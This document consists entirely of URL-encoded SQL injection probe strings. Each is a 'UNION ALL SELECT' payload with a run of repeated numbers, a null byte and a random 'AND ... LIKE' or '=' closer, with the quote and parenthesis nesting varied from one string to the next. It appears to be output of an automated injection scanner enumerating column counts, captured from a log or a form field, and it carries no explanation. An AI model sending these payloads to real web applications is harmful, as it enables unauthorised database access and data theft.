-1201%27%20UNION%20ALL%20SELECT%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%2C%209157%00%20AND%20%27AyuE%27%20LIKE%20%27AyuE -6084%27%20UNION%20ALL%20SELECT%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%00%20AND%20%27OUdM%27%20LIKE%20%27OUdM -3552%27%20UNION%20ALL%20SELECT%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%00%20AND%20%27hkBU%27%20LIKE%20%27hkBU -6321%27%20UNION%20ALL%20SELECT%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%2C%204060%00%20AND%20%27pefW%27%20LIKE%20%27pefW -3999%27%20UNION%20ALL%20SELECT%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%00%20AND%20%27bAZv%27%20LIKE%20%27bAZv -3019%27%20UNION%20ALL%20SELECT%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%2C%206833%00%20AND%20%27EWTq%27%20LIKE%20%27EWTq -9374%27%20UNION%20ALL%20SELECT%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%2C%207304%00%20AND%20%27GbLW%27%20LIKE%20%27GbLW -8531%27%20UNION%20ALL%20SELECT%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%00%20AND%20%27PJlu%27%20LIKE%20%27PJlu -7866%27%20UNION%20ALL%20SELECT%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%2C%202514%00%20AND%20%27twyx%27%20LIKE%20%27twyx -5419%27%20UNION%20ALL%20SELECT%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%00%20AND%20%27tWJR%27%20LIKE%20%27tWJR -7572%22%29%20UNION%20ALL%20SELECT%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%00%20AND%20%28%22CwYi%22%3D%22CwYi -1564%22%29%20UNION%20ALL%20SELECT%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%2C%204189%00%20AND%20%28%22KuaV%22%3D%22KuaV -4900%22%29%20UNION%20ALL%20SELECT%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%00%20AND%20%28%22JCAY%22%3D%22JCAY -3291%22%29%20UNION%20ALL%20SELECT%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%00%20AND%20%28%22jUAZ%22%3D%22jUAZ -5445%22%29%20UNION%20ALL%20SELECT%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%00%20AND%20%28%22YSLB%22%3D%22YSLB -7175%22%29%20UNION%20ALL%20SELECT%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%2C%205616%00%20AND%20%28%22TMHO%22%3D%22TMHO -6909%22%29%20UNION%20ALL%20SELECT%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%00%20AND%20%28%22wutf%22%3D%22wutf -2752%22%29%20UNION%20ALL%20SELECT%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%2C%203961%00%20AND%20%28%22SFVJ%22%3D%22SFVJ -7575%22%29%20UNION%20ALL%20SELECT%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%00%20AND%20%28%22Zjai%22%3D%22Zjai -6832%22%29%20UNION%20ALL%20SELECT%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%00%20AND%20%28%22tOZc%22%3D%22tOZc -9985%22%29%29%20UNION%20ALL%20SELECT%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%00%20AND%20%28%28%22vBYb%22%3D%22vBYb -7885%22%29%29%20UNION%20ALL%20SELECT%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%2C%204112%00%20AND%20%28%28%22ueAJ%22%3D%22ueAJ -3683%22%29%29%20UNION%20ALL%20SELECT%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%00%20AND%20%28%28%22xZNY%22%3D%22xZNY -8005%22%29%29%20UNION%20ALL%20SELECT%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%2C%203803%00%20AND%20%28%28%22MlBp%22%3D%22MlBp -6868%22%29%29%20UNION%20ALL%20SELECT%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%2C%204680%00%20AND%20%28%28%22wfbs%22%3D%22wfbs -5497%22%29%29%20UNION%20ALL%20SELECT%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%00%20AND%20%28%28%22YXuz%22%3D%22YXuz -3807%22%29%29%20UNION%20ALL%20SELECT%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%00%20AND%20%28%28%22lmmM%22%3D%22lmmM -1359%22%29%29%20UNION%20ALL%20SELECT%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%00%20AND%20%28%28%22JvUf%22%3D%22JvUf -2661%22%29%29%20UNION%20ALL%20SELECT%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%00%20AND%20%28%28%22WhIU%22%3D%22WhIU -4776%22%29%29%20UNION%20ALL%20SELECT%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%00%20AND%20%28%28%22SRkW%22%3D%22SRkW -1218%22%29%29%29%20UNION%20ALL%20SELECT%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%2C%209336%00%20AND%20%28%28%28%22xoua%22%3D%22xoua -3848%22%29%29%29%20UNION%20ALL%20SELECT%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%00%20AND%20%28%28%28%22Hblb%22%3D%22Hblb -2215%22%29%29%29%20UNION%20ALL%20SELECT%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%2C%206955%00%20AND%20%28%28%28%22rUrd%22%3D%22rUrd -5797%22%29%29%29%20UNION%20ALL%20SELECT%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%00%20AND%20%28%28%28%22DqxL%22%3D%22DqxL -7208%22%29%29%29%20UNION%20ALL%20SELECT%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%00%20AND%20%28%28%28%22JxdH%22%3D%22JxdH -7786%22%29%29%29%20UNION%20ALL%20SELECT%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%2C%204414%00%20AND%20%28%28%28%22BWgd%22%3D%22BWgd -8338%22%29%29%29%20UNION%20ALL%20SELECT%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%2C%207844%00%20AND%20%28%28%28%22PBwX%22%3D%22PBwX -9894%22%29%29%29%20UNION%20ALL%20SELECT%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%2C%204518%00%20AND%20%28%28%28%22LUgp%22%3D%22LUgp -7570%22%29%29%29%20UNION%20ALL%20SELECT%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%2C%203522%00%20AND%20%28%28%28%22FNfh%22%3D%22FNfh -8521%22%29%29%29%20UNION%20ALL%20SELECT%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%2C%208762%00%20AND%20%28%28%28%22bkMV%22%3D%22bkMV -7924%22%20UNION%20ALL%20SELECT%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%00%20AND%20%22NMhk%22%3D%22NMhk -2635%22%20UNION%20ALL%20SELECT%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%00%20AND%20%22sOPX%22%3D%22sOPX -1141%22%20UNION%20ALL%20SELECT%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%00%20AND%20%22MIRD%22%3D%22MIRD -6572%22%20UNION%20ALL%20SELECT%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%00%20AND%20%22kyrW%22%3D%22kyrW -4548%22%20UNION%20ALL%20SELECT%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%00%20AND%20%22wVrf%22%3D%22wVrf -8445%22%20UNION%20ALL%20SELECT%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%00%20AND%20%22GAtN%22%3D%22GAtN 